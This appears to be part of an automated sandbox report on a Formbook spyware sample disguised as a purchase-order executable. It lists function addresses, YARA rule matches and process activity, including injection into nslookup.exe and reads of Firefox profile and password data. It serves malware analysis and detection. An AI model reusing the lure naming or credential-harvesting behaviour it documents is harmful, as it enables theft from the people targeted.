        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A75713_2_016A7571
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B95C33_2_016B95C3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168D5B03_2_0168D5B0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E14603_2_015E1460
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AF43F3_2_016AF43F
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AF7B03_2_016AF7B0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016356303_2_01635630
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A16CC3_2_016A16CC
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F99503_2_015F9950
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160B9503_2_0160B950
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016859103_2_01685910
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165D8003_2_0165D800
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F38E03_2_015F38E0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AFB763_2_016AFB76
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01665BF03_2_01665BF0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0162DBF93_2_0162DBF9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160FB803_2_0160FB80
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01663A6C3_2_01663A6C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AFA493_2_016AFA49
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A7A463_2_016A7A46
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0169DAC63_2_0169DAC6
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01635AA03_2_01635AA0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168DAAC3_2_0168DAAC
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01691AA33_2_01691AA3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A7D733_2_016A7D73
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F3D403_2_015F3D40
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016A1D5A3_2_016A1D5A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160FDC03_2_0160FDC0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01669C323_2_01669C32
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AFCF23_2_016AFCF2
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AFF093_2_016AFF09
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015B3FD23_2_015B3FD2
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015B3FD53_2_015B3FD5
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F1F923_2_015F1F92
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AFFB13_2_016AFFB1
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F9EB03_2_015F9EB0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_004101113_2_00410111
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_004101133_2_00410113
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_004103333_2_00410333
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0040E3B33_2_0040E3B3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_004026103_2_00402610
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_004028F03_2_004028F0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_00416A233_2_00416A23
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_00402E403_2_00402E40
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_00402E323_2_00402E32
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_004011003_2_00401100
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_004033D03_2_004033D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0042D9233_2_0042D923
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327A3525_2_0327A352
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032803E65_2_032803E6
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031CE3F05_2_031CE3F0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032602745_2_03260274
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032402C05_2_032402C0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031B01005_2_031B0100
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0325A1185_2_0325A118
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032481585_2_03248158
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032801AA5_2_032801AA
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032741A25_2_032741A2
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032781CC5_2_032781CC
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032520005_2_03252000
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031E47505_2_031E4750
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C07705_2_031C0770
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031BC7C05_2_031BC7C0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031DC6E05_2_031DC6E0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C05355_2_031C0535
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032805915_2_03280591
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032644205_2_03264420
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032724465_2_03272446
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0326E4F65_2_0326E4F6
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327AB405_2_0327AB40
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03276BD75_2_03276BD7
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031BEA805_2_031BEA80
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031D69625_2_031D6962
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0328A9A65_2_0328A9A6
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C29A05_2_031C29A0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031CA8405_2_031CA840
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C28405_2_031C2840
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031A68B85_2_031A68B8
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031EE8F05_2_031EE8F0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03202F285_2_03202F28
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03262F305_2_03262F30
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031E0F305_2_031E0F30
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03234F405_2_03234F40
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0323EFA05_2_0323EFA0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031B2FC85_2_031B2FC8
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031CCFE05_2_031CCFE0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327EE265_2_0327EE26
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C0E595_2_031C0E59
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031D2E905_2_031D2E90
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327CE935_2_0327CE93
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327EEDB5_2_0327EEDB
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031CAD005_2_031CAD00
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0325CD1F5_2_0325CD1F
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031D8DBF5_2_031D8DBF
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031BADE05_2_031BADE0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C0C005_2_031C0C00
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03260CB55_2_03260CB5
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031B0CF25_2_031B0CF2
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327132D5_2_0327132D
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031AD34C5_2_031AD34C
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0320739A5_2_0320739A
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C52A05_2_031C52A0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032612ED5_2_032612ED
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031DB2C05_2_031DB2C0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0328B16B5_2_0328B16B
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031AF1725_2_031AF172
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031F516C5_2_031F516C
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031CB1B05_2_031CB1B0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327F0E05_2_0327F0E0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032770E95_2_032770E9
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C70C05_2_031C70C0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0326F0CC5_2_0326F0CC
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327F7B05_2_0327F7B0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032056305_2_03205630
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032716CC5_2_032716CC
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032775715_2_03277571
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0325D5B05_2_0325D5B0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032895C35_2_032895C3
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327F43F5_2_0327F43F
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031B14605_2_031B1460
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327FB765_2_0327FB76
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031DFB805_2_031DFB80
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03235BF05_2_03235BF0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031FDBF95_2_031FDBF9
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03233A6C5_2_03233A6C
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03277A465_2_03277A46
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327FA495_2_0327FA49
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03205AA05_2_03205AA0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03261AA35_2_03261AA3
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0325DAAC5_2_0325DAAC
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0326DAC65_2_0326DAC6
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_032559105_2_03255910
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C99505_2_031C9950
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031DB9505_2_031DB950
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0322D8005_2_0322D800
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C38E05_2_031C38E0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327FF095_2_0327FF09
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C1F925_2_031C1F92
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327FFB15_2_0327FFB1
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03183FD25_2_03183FD2
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03183FD55_2_03183FD5
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C9EB05_2_031C9EB0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03277D735_2_03277D73
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031C3D405_2_031C3D40
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03271D5A5_2_03271D5A
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_031DFDC05_2_031DFDC0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_03239C325_2_03239C32
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_0327FCF25_2_0327FCF2
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A618C05_2_02A618C0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A7A2E05_2_02A7A2E0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A5CACE5_2_02A5CACE
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A5CAD05_2_02A5CAD0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A5CCF05_2_02A5CCF0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A5AD705_2_02A5AD70
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: 5_2_02A633E05_2_02A633E0
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: String function: 0323F290 appears 105 times
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: String function: 031AB970 appears 280 times
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: String function: 03207E54 appears 111 times
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: String function: 0322EA12 appears 86 times
        Source: C:\Windows\SysWOW64\nslookup.exeCode function: String function: 031F5130 appears 58 times
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: String function: 0165EA12 appears 86 times
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: String function: 0166F290 appears 105 times
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: String function: 015DB970 appears 280 times
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: String function: 01625130 appears 58 times
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: String function: 01637E54 appears 111 times
        Source: Purchase Order_20240528.exeStatic PE information: invalid certificate
        Source: Purchase Order_20240528.exe, 00000000.00000002.2087413581.0000000005280000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000000.00000002.2084141939.00000000009FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000000.00000002.2085247193.0000000002805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000000.00000002.2088150699.0000000006C70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000000.00000000.2065405784.00000000004A0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameromN.exe" vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000000.00000002.2085740892.000000000398E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001189000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenslookup.exej% vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000003.00000002.2209729010.0000000001170000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenslookup.exej% vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exe, 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exeBinary or memory string: OriginalFilenameromN.exe" vs Purchase Order_20240528.exe
        Source: Purchase Order_20240528.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Purchase Order_20240528.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, ckGhAYrCCcn6NHSKya.csSecurity API names: _0020.SetAccessControl
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, ckGhAYrCCcn6NHSKya.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, ckGhAYrCCcn6NHSKya.csSecurity API names: _0020.AddAccessRule
        Source: 0.2.Purchase Order_20240528.exe.6c70000.9.raw.unpack, wHVIVE5avXWDL9RIrc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, wHVIVE5avXWDL9RIrc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, wHVIVE5avXWDL9RIrc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, ckGhAYrCCcn6NHSKya.csSecurity API names: _0020.SetAccessControl
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, ckGhAYrCCcn6NHSKya.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 0.2.Purchase Order_20240528.exe.3b30c80.5.raw.unpack, ckGhAYrCCcn6NHSKya.csSecurity API names: _0020.AddAccessRule
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, ckGhAYrCCcn6NHSKya.csSecurity API names: _0020.SetAccessControl
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, ckGhAYrCCcn6NHSKya.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: 0.2.Purchase Order_20240528.exe.3bb52a0.4.raw.unpack, ckGhAYrCCcn6NHSKya.csSecurity API names: _0020.AddAccessRule
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/13
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Purchase Order_20240528.exe.logJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeMutant created: NULL
        Source: C:\Windows\SysWOW64\nslookup.exeFile created: C:\Users\user\AppData\Local\Temp\7--93mK-Jump to behavior
        Source: Purchase Order_20240528.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: Purchase Order_20240528.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
        Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: nslookup.exe, 00000005.00000003.2409548605.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000003.2409548605.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4534212709.0000000002BE2000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.4534212709.0000000002BAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Purchase Order_20240528.exeVirustotal: Detection: 41%
        Source: Purchase Order_20240528.exeReversingLabs: Detection: 26%
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeFile read: C:\Users\user\Desktop\Purchase Order_20240528.exe:Zone.IdentifierJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order_20240528.exe "C:\Users\user\Desktop\Purchase Order_20240528.exe"
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess created: C:\Users\user\Desktop\Purchase Order_20240528.exe "C:\Users\user\Desktop\Purchase Order_20240528.exe"
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeProcess created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"
        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeProcess created: C:\Users\user\Desktop\Purchase Order_20240528.exe "C:\Users\user\Desktop\Purchase Order_20240528.exe"Jump to behavior
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exeProcess created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeSection loaded: cryptbase.dllJump to behavior
